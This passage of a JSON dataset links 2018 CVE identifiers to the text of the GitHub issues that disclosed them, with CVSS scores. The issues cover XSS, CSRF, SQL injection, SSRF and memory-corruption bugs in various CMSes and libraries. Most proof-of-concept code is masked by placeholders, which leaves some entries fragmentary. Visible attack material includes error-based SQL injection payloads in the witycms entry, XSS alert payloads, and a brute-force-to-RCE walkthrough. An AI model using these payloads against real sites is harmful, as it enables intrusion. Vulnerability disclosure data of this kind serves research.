        "description": "memory corruption in flirt signature loading. memory corruption in flirt signature loading Work environment | Questions | Answers | | | PATHTAG (mandatory) | gentoo NUMBERTAG File format of the file you reverse (mandatory) | N/A. | Architecture/bits of the file (mandatory) | N/A. | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG ge2df NUMBERTAG a8 commit: APITAG build NUMBERTAG Expected behavior Flirt database loading Actual behavior memory corruption Steps to reproduce the behavior APITAG Additional Logs, screenshots, source code, configuration dump, ... FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-15842",
        "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/679",
        "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/679",
        "Repo_new": "wolfcms/wolfcms",
        "Issue_Created_At": "2018-08-08T18:25:15Z",
        "description": "Cross Site Scripting (XSS) Vulnerability in wolfcms NUMBERTAG Submitted by: Author: Ritesh kumar Email: EMAILTAG APITAG URLTAG Proof of Concept Hello, I would like to report a vulnerability that I discovered in wolfcms NUMBERTAG which can be exploited to perform Cross Site Scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization in the \"slug\" parameter. The exploitation example below uses the APITAG APITAG function to display NUMBERTAG as alert text. Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Vulnerability Type: Cross Site Scripting (XSS) Vendor of Product: wolfcms Affected Product Code Base: wolfcms ( URLTAG version NUMBERTAG Affected Component: URLTAG Vulnerable parameter: SLUG Attack Type: Remote Attack Vectors: Steps to reproduce the vulnerability: APITAG to wolfcms as admin user. APITAG the URL \" URLTAG \". APITAG on metadata button NUMBERTAG enter the malicious java script \u201c> APITAG alert NUMBERTAG APITAG into slug parameter NUMBERTAG click on save and close button, xss will be get executed and NUMBERTAG will be reflected on the browser. Additional information Wolf CMS version: DB type and version: HTTP server type and version: Please find the screenshots below NUMBERTAG Enter the malicious java script into the slug parameter. FILETAG NUMBERTAG click on save and close button. FILETAG NUMBERTAG After clicking on save and close button, the malicious java script payload will get executed and it will displayed on the browser. FILETAG Reference: URLTAG Author: RITESH KUMAR Additional information: Wolf CMS version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-15843",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1293",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1293",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2018-08-11T13:37:18Z",
        "description": "Cross Site Scripting Vulnerability in APITAG CMS NUMBERTAG ulnerability name Cross APITAG Scripting. Severity: High Submitted By: Ritesh Kumar Email: EMAILTAG Vendor of Product: APITAG CMS Version NUMBERTAG Attack type: remote Description: Hello, I would like to report a vulnerability that I discovered in APITAG CMS NUMBERTAG which can be exploited to perform Cross Site Scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization in the APITAG New Page\" parameter. The exploitation example below uses the APITAG APITAG function to display \"XSS\" as alert text. Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. STEPS TO REPRODUCE: APITAG to APITAG CMS APITAG the URL \" FILETAG \". APITAG on Create New Page button then it will be redirected to FILETAG NUMBERTAG enter the malicious java script \u201c> APITAG into Add New Page parameter and add some text in body part then save the page. APITAG view that page by clicking on view button, xss will be get executed and XSS will be reflected on the browser. PROOF OF CONCEPT NUMBERTAG Enter the malicious java script \u201c> APITAG into Add New Page and add some text in body part then click on save button. FILETAG NUMBERTAG click on view and view that page. FILETAG NUMBERTAG After clicking on VIEW button our XSS payload will bet get executed. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-15844",
        "Issue_Url_old": "https://github.com/Vict00r/poc/issues/1",
        "Issue_Url_new": "https://github.com/vict00r/poc/issues/1",
        "Repo_new": "Vict00r/poc",
        "Issue_Created_At": "2018-08-21T15:29:50Z",
        "description": "APITAG NUMBERTAG allows CSRF to change the administrator account's pssword.. APITAG NUMBERTAG allows CSRF to change the administrator account's pssword. After the administrator login in,open the poc,the administrator account's password will been changed to NUMBERTAG POC\uff1a CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15845",
        "Issue_Url_old": "https://github.com/gleez/cms/issues/800",
        "Issue_Url_new": "https://github.com/gleez/cms/issues/800",
        "Repo_new": "gleez/cms",
        "Issue_Created_At": "2018-08-10T10:14:29Z",
        "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page to add an administrator. poc\uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15847",
        "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/12",
        "Issue_Url_new": "https://github.com/choregus/puppycms/issues/12",
        "Repo_new": "choregus/puppycms",
        "Issue_Created_At": "2018-08-07T05:01:23Z",
        "description": "There have XSS vulnerability that can excute javascript. There are NUMBERTAG SS vulnerabilities loading FILETAG sign in and select \"SETTINGS\", Insert the payload \"' APITAG alert NUMBERTAG APITAG \" in the add page /URL/ URL / link text and submit. open FILETAG line NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15848",
        "Issue_Url_old": "https://github.com/Westbrookadmin/portfolioCMS/issues/1",
        "Issue_Url_new": "https://github.com/westbrookadmin/portfoliocms/issues/1",
        "Repo_new": "westbrookadmin/portfoliocms",
        "Issue_Created_At": "2018-08-16T05:39:28Z",
        "description": "There are two CSRF vulnerabilities that can create new pages or update the website settings. APITAG is a CSRF vulnerability that can create new pages via APITAG poc: APITAG create a new page ERRORTAG APITAG is a CSRF vulnerability that can update the website settings via FILETAG . poc: APITAG update the website settings CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15850",
        "Issue_Url_old": "https://github.com/redaxo/redaxo4/issues/420",
        "Issue_Url_new": "https://github.com/redaxo/redaxo4/issues/420",
        "Repo_new": "redaxo/redaxo4",
        "Issue_Created_At": "2018-08-11T03:39:03Z",
        "description": "There is a CSRF vulnerability that can add an administrator. After administrator log in, there is a CSRF vulnerability that can add an administrator via PATHTAG poc FILETAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15851",
        "Issue_Url_old": "https://github.com/flexocms/flexo1.source/issues/25",
        "Issue_Url_new": "https://github.com/flexocms/flexo1.source/issues/25",
        "Repo_new": "flexocms/flexo1.source",
        "Issue_Created_At": "2018-08-10T11:48:49Z",
        "description": "There is a CSRF vulnerability that can add an administrator. After administrator log in, there is a CSRF vulnerability that can add an administrator via PATHTAG poc FILETAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15869",
        "Issue_Url_old": "https://github.com/hashicorp/packer/issues/6584",
        "Issue_Url_new": "https://github.com/hashicorp/packer/issues/6584",
        "Repo_new": "hashicorp/packer",
        "Issue_Created_At": "2018-08-13T22:41:00Z",
        "description": "Make \"owners\" field of source_ami_filter required: RFC. APITAG security team pointed out an interesting potential exploit where if you request an amazon AMI via a source_ami_filter, but don't have \"owner\" selected, you can accidentally use a malicious base image instead of one from your own organization or a trusted vendor. The impact of making the \"owner\" field required would be low for the users (I strongly suspect that a majority of people using the filter already define the owner field) but could save users from making a potentially dangerous mistake. I think we should have Packer fail during validation with an error that says this field must be designated; if we decide that there is a valid use case where people may not want to have to set this field, we could potentially allow an opt out like setting \"owner\" to \"any\" but honestly I can't think of a situation where this really makes a great deal of sense. I'm going to slate this for NUMBERTAG but I'd like to hear community thoughts.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15870",
        "Issue_Url_old": "https://github.com/libming/libming/issues/122",
        "Issue_Url_new": "https://github.com/libming/libming/issues/122",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-09T06:36:38Z",
        "description": "Invalid memory address dereference in function APITAG and APITAG (in APITAG Hi, i found a issue in the libming NUMBERTAG it is crashed by function APITAG to APITAG It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15871",
        "Issue_Url_old": "https://github.com/libming/libming/issues/123",
        "Issue_Url_new": "https://github.com/libming/libming/issues/123",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-09T06:38:19Z",
        "description": "Invalid memory address dereference in APITAG and APITAG (in APITAG Hi, i found a issue in the libming NUMBERTAG It's similar to URLTAG but it is crashed by function APITAG to APITAG .It just cause a Invalid memory address dereference.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15886",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/455",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/455",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-08-27T13:48:24Z",
        "description": "php code execution in snippets modul. Hello sir, I have found a php code execution vulnerability in Monstra APITAG I was able to execute PHP command. visit: URLTAG In this page\uff0cinput <?php APITAG example: APITAG then visit\uff1a FILETAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-15890",
        "Issue_Url_old": "https://github.com/ethereum/ethereumj/issues/1161",
        "Issue_Url_new": "https://github.com/ethereum/ethereumj/issues/1161",
        "Repo_new": "ethereum/ethereumj",
        "Issue_Created_At": "2018-08-20T14:48:16Z",
        "description": "Unsafe Java object serialization. What's wrong Ethash class uses pure Java object serialization to store light and full datasets. As MENTIONTAG pointed out, this serialization in its pure form can be exploited, additional information can be found here URLTAG . However, in this particular case it doesn't look valuable for attacker. How to fix Looks like the easiest way is to use custom serialization.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15893",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/149",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/149",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-08-06T04:43:10Z",
        "description": "wuzhicms NUMBERTAG sql injection vulnerability. > A sql injection was discovered in WUZHI CMS NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via the APITAG filename APITAG code ERRORTAG POC APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15894",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/150",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/150",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-08-07T14:00:48Z",
        "description": "wuzhicms NUMBERTAG PATHTAG sql injection vulnerability. > A sql injection was discovered in WUZHI CMS NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via the APITAG filename APITAG poc CODETAG CODETAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15895",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/40",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/40",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-08-18T19:06:28Z",
        "description": "iCMS NUMBERTAG Has A SSRF vulnerability. >A SSRF vulnerability was discovered in iCMS NUMBERTAG here is a SSRF vulnerability that allows attackers to remotely construct malicious data to read server sensitive information. via the APITAG Notice This vulnerability is used in the right way APITAG of loophole repair is bypassed, or the flaw caused by imperfect repair. cause of loopholes APITAG following is the repair code of APITAG . In the code, the URL is judged by the intranet IP before request. APITAG NUMBERTAG Bypass the idea Through the custom domain name, specify the parsed A record as the intranet IP APITAG bypassing the URL detection of the program. APITAG POC APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-15899",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/21",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/21",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2018-08-24T07:36:08Z",
        "description": "APITAG has a XSS vulnerability. Vulnerability description A xss vulnerability was discovered in APITAG Vulnerability trigger point: PATHTAG poc: URLTAG \"> APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-15917",
        "Issue_Url_old": "https://github.com/bbalet/jorani/issues/254",
        "Issue_Url_new": "https://github.com/bbalet/jorani/issues/254",
        "Repo_new": "bbalet/jorani",
        "Issue_Created_At": "2018-08-02T20:28:32Z",
        "description": "Multiple Vulnerabilities. Hi, The last version NUMBERTAG has multiple critical vulnerabilities, please contact me to solve it. Thank you!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16131",
        "Issue_Url_old": "https://github.com/akka/akka-http/issues/2137",
        "Issue_Url_new": "https://github.com/akka/akka-http/issues/2137",
        "Repo_new": "akka/akka-http",
        "Issue_Created_At": "2018-08-06T09:26:09Z",
        "description": "APITAG does not respect APITAG When using FILETAG to handle APITAG any FILETAG applies to the compressed size, not the uncompressed size. This might facilitate APITAG attacks. The reason might be that APITAG uses APITAG which creates a new APITAG that is not limitable.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16157",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/5",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/5",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2018-08-29T21:50:18Z",
        "description": "There is a Business logic vulnerability that can change the payment price.. First we have selected seven items. The price is NUMBERTAG FILETAG Then we can get the request package. FILETAG We changed the value of the parameter item_totals to NUMBERTAG FILETAG So we can get free products like this. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16233",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/22",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/22",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2018-08-30T08:06:13Z",
        "description": "APITAG NUMBERTAG has XSS in the FILETAG . APITAG NUMBERTAG has XSS in the FILETAG via tags parameter Affected Version : APITAG NUMBERTAG Affected URL: PATHTAG POC: POST PATHTAG HTTP NUMBERTAG Host: User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG APITAG APITAG rcc_accepted NUMBERTAG sidenav_treesearch=; APITAG APITAG APITAG icms[device_type]=desktop; APITAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16234",
        "Issue_Url_old": "https://github.com/urbanadventurer/WhatWeb/issues/261",
        "Issue_Url_new": "https://github.com/urbanadventurer/whatweb/issues/261",
        "Repo_new": "urbanadventurer/whatweb",
        "Issue_Created_At": "2018-08-27T00:58:48Z",
        "description": "Security Issue: Stored XSS. When I used APITAG to scan a target and use APITAG option, stored XSS may occur. The target just like this: APITAG I used APITAG with APITAG NUMBERTAG APITAG And the result: ERRORTAG When I use Windows7 with IE7 open the result, XSS has been triggered. APITAG Suggestion: Use url encode for the output url. APITAG will be convert to APITAG . Discovered by EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16237",
        "Issue_Url_old": "https://github.com/howchen/howchen/issues/2",
        "Issue_Url_new": "https://github.com/howchen/howchen/issues/2",
        "Repo_new": "howchen/howchen",
        "Issue_Created_At": "2018-08-29T07:35:30Z",
        "description": "Get a APITAG admin permission by Force authentication. PART NUMBERTAG get the admin authenticaton Here is a default APITAG admin user's cookie: CODETAG the APITAG would be updated when admin logins in, \" APITAG \" is a COOKIE_PREFIX by default NUMBERTAG comes from APITAG function in php, the cookie is valided for NUMBERTAG hours\uff0c it means we can get the admin permission just by Enumerating maximum NUMBERTAG times if the admin logged In NUMBERTAG get a string by APITAG function FILETAG APITAG NUMBERTAG crafted a request CODETAG NUMBERTAG Send to intruder,\uff0cconfiguraton the Positions and Payloads e.g. APITAG PART NUMBERTAG Remote Code Execution when logined as a admin (By part1\uff09, There is a Remote Code Execution vulnerability NUMBERTAG edit and update the file with the code APITAG PATHTAG ERRORTAG NUMBERTAG isite the url below URLTAG PART NUMBERTAG Directory Traversal when logined as a admin (By part1\uff09, There is a Directory Traversal vulnerability read the content of PATHTAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 2.7,
        "impactScore": 1.4,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-16248",
        "Issue_Url_old": "https://github.com/b3log/solo/issues/12489",
        "Issue_Url_new": "https://github.com/b3log/solo/issues/12489",
        "Repo_new": "b3log/solo",
        "Issue_Created_At": "2018-08-27T02:38:47Z",
        "description": "A persistent XSS was found.. Hey, the wonderful work of personal blog! I find the security problems on the website: A cross site scripting (XSS) vulnerability found in the Input page under the APITAG Articles\" menu in b3log NUMBERTAG with an ID of APITAG stored in the \"tag\" JSON field allows remote attackers to inject arbitrary Web scripts or HTML via a carefully crafted site name via a APITAG authenticated HTTP request. playload\uff1a APITAG alert NUMBERTAG APITAG POC\uff1a PUT PATHTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG APITAG Connection: close APITAG ]( URLTAG \u6b22\u8fce\u4f7f\u7528 APITAG URLTAG APITAG \u53e6\u5916\uff0c\u6b22\u8fce\u4f60\u52a0\u5165 FILETAG \uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528\u535a\u5ba2\u8d26\u53f7\u76f4\u63a5\u767b\u5f55\uff01 Solo \u535a\u5ba2\u7cfb\u7edf\u662f\u4e00\u4e2a\u5f00\u6e90\u9879\u76ee\uff0c\u5982\u679c\u4f60\u89c9\u5f97\u5b83\u5f88\u8d5e\uff0c\u8bf7\u5230 \u9879\u76ee\u9996\u9875 URLTAG \u7ed9\u9897\u661f\u9f13\u52b1\u4e00\u4e0b APITAG ]( URLTAG \u6b22\u8fce\u4f7f\u7528 APITAG URLTAG APITAG \u53e6\u5916\uff0c\u6b22\u8fce\u4f60\u52a0\u5165 FILETAG \uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528\u535a\u5ba2\u8d26\u53f7\u76f4\u63a5\u767b\u5f55\uff01 Solo \u535a\u5ba2\u7cfb\u7edf\u662f\u4e00\u4e2a\u5f00\u6e90\u9879\u76ee\uff0c\u5982\u679c\u4f60\u89c9\u5f97\u5b83\u5f88\u8d5e\uff0c\u8bf7\u5230 \u9879\u76ee\u9996\u9875 URLTAG \u7ed9\u9897\u661f\u9f13\u52b1\u4e00\u4e0b APITAG APITAG APITAG APITAG Markdown\"}} This is a packet that contains \"payload\" submitted. Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG FILETAG FILETAG FILETAG Multiple locations are executing script code, including the front page of blog. If the data is not sanitized upon input, these components are going to return arbitrary web script or HTML that can be rendered by the browser .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16249",
        "Issue_Url_old": "https://github.com/b3log/symphony/issues/729",
        "Issue_Url_new": "https://github.com/b3log/symphony/issues/729",
        "Repo_new": "b3log/symphony",
        "Issue_Created_At": "2018-08-27T07:43:59Z",
        "description": "There is a persistent XSS in the title of the post office. Hey, I found the security problems on the website: A cross site scripting (XSS) vulnerability found in APITAG under APITAG in Symphony NUMBERTAG the ID APITAG of which is stored in the APITAG JSON field, executes \"payload\" when accessing this address (\" URLTAG \"), allowing remote attacks Any Web script or HTML can be inserted into the APITAG authen through a well written web site name. Verified HTTP request. playload\uff1a APITAG alert NUMBERTAG APITAG POC: PUT /article NUMBERTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG APITAG APITAG X Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG APITAG APITAG APITAG b3log APITAG Connection: close APITAG APITAG APITAG APITAG This is a packet that contains \"payload\" submitted. FILETAG Javascript gets executed. Here's an output of the mentioned payload when entered and saved. APITAG is executed. The following is the output of the payload mentioned in the input and save. The.Ip address is URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-16250",
        "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/156",
        "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/156",
        "Repo_new": "creatiwity/witycms",
        "Issue_Created_At": "2018-08-29T08:41:37Z",
        "description": "Persistent XSS. The \"utilisateur\" menu on the APITAG NUMBERTAG site modifies the presence of XSS at two input points for user information, with the parameters \"first name\" and \"last name\". payload: \" APITAG \" APITAG Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG Payload data are submitted to PATHTAG FILETAG When users want to change their names, clicking the input box triggers the code. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16251",
        "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/157",
        "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/157",
        "Repo_new": "creatiwity/witycms",
        "Issue_Created_At": "2018-08-29T09:47:35Z",
        "description": "Find a SQL injection. Search for user discovery injection under the witycms NUMBERTAG APITAG menu. No input parameters were filtered. PATHTAG APITAG payload: firstname=' AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT NUMBERTAG a NUMBERTAG SELECT APITAG NUMBERTAG FROM APITAG GROUP BY x)a) APITAG lastname=' AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT NUMBERTAG a NUMBERTAG SELECT APITAG NUMBERTAG FROM APITAG GROUP BY x)a) APITAG Defective pages and addresses FILETAG URLTAG Attack through sqlmap, find database name and database type. FILETAG FILETAG A page executed by background code. FILETAG PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16278",
        "Issue_Url_old": "https://github.com/howchen/howchen/issues/3",
        "Issue_Url_new": "https://github.com/howchen/howchen/issues/3",
        "Repo_new": "howchen/howchen",
        "Issue_Created_At": "2018-08-31T08:29:53Z",
        "description": "APITAG sql injection via dir parameter. FILETAG CODETAG execute the commands below: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16283",
